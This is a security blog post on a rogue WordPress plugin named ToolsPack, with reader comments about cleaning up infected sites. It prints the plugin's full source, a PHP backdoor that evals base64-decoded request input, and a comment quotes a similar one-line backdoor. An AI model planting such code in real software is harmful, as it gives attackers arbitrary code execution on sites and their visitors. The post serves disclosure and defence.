We deal with many compromised sites daily and lately we are seeing something in common across many of the sites running WordPress.
They have installed a plugin called ToolsPack ( ./wp-content/plugins/ToolsPack/ToolsPack.php), which according to the author will “Supercharge your WordPress site with powerful features previously only available to WordPress.com users. core release. Keep the plugin updated!”
Interesting…
However, when we look at the plugin code, all it does is this:
<?php
/*
Plugin Name: ToolsPack
Description: Supercharge your WordPress site with powerful features previously only available to WordPress.com users. core release. Keep the plugin updated!
Version: 1.2
Author: Mark Stain
Author URI: http://checkWPTools.com/
*/
$_REQUEST[e] ? eVAl( base64_decode( $_REQUEST[e] ) ) : exit;
?>
If you are not familiar with PHP, this is just a backdoor that allows attackers to execute any code on your site. If you see this plugin installed on your system, remove it right away!
How this plugin got in there is a different question. On some of compromised websites we noticed it implemented via wp-admin (so stolen passwords), and on others it is being installed via another backdoor.
Removing this plugin will not likely solve your security issues. You have to do a full review of the website – check all your files, update WordPress, change passwords, etc.
Have you seen this plugin, or something like it? make sure to leave a comment with your experience.
Site is hacked? Not sure? Check here http://sitecheck.sucuri.net
Luke Leal
Cesar Anjos
Yuliyan Tsvetkov
Denis Sinegubko
Eugene Wozniak
Rianna MacLeod
Krasimir Konov
Puja Srivastava
37 comments
I’ve also seen this one while cleaning up WP malware:
akismet_wp/cls_sqlphp.php
// Ulf.H
With the code:
$_GET[‘c’]($_POST[‘pass123456’]);
I found this plugin on one of my sites on 2/13. It appears to have gotten installed over the weekend. I found that the plugin was executed twice over the weekend. Index.php in the root folder along with wp-contents folder had been altered to include a malware script that related to JS/Blacole.BV. I have not found any other altered files.
This sounds like what I went through about 2 weeks ago. It attacked all
index files with a chunk of malicious code. I was told it was attached
to the shell on a WP install. It executed twice over the same weekend Bob mentioned. That particular WP site was one page — it was on hold for a client who had stopped the project. After I cleaned up the malware, I canned all wp files. I didn’t bother to check the plugins page before doing this.
this my web
http://fourseasonnews.blogspot.com/
There’s a bug in the Absolute Privacy plugin that affects upgrades to WP 3.3.x and allows backend logins with any password. This appears to be an easy way to upload the ToolsPack malware.
http://wordpress.org/support/topic/absolute-privacy-badly-broken
A client’s site was hacked with this yesterday. Working on the cleanup now…
hello, be carefully , this thing attacks all index.php/html/html files and adds there few lines of another malware..
That’s a good catch. Just came across this plugin and wanted to be sure, if it is something fishy. Thanks.
My Clients Site hacked yesterday and now removing malware code from it..
should i directly delete plugin files and un install it via wp-admin
Yep, just removed this plugin and the code it added to all my index.php files, IP address of attacker was 83.69.224.227 Russia….. So angry, have cleaned this site 5 times now, Google has blacklisted it now too, I have just installed a block Country Plugin….All of Russia is now blocked…….
WordPress is a big peace of crap and buggy software. Use something else.
Thanks for this, I had no idea what was going on.
Little new to this, how do I clean up this malware properly? I’ve deleted the folder toolspack which was in the plugins folder, reinstalled wordpress and changed all the passwords.
I found p_music_player beside the ToolsPack in some of my clients websites. I check where the attacker come. He didn’t make any exploit attack. He use tools to find any WordPress website with user admin:admin or maybe another weak password. So change your weak password
Backdoor attacks have been coming in for the past 7 days. This effer indeed left a backdoor. Thankfully, I had them sealed. Those struck in February, be on the look out!
ToolsPack is a rogue WordPress utility. See the latest news on it at
http://www.pcworld.com/businesscenter/article/254133/infected_wordpress_blogs_blamed_for_mac_flashback_trojan.html
I’ve seen this plugin several times. In most of the cases I’ve seen the WordPress was “hacked” because of Admin account weak credentials, thus the user was able to upload such a plugin. Quite smart!
Thanks for the code tip, great help1
http://eigo.co.uk
Comments are closed.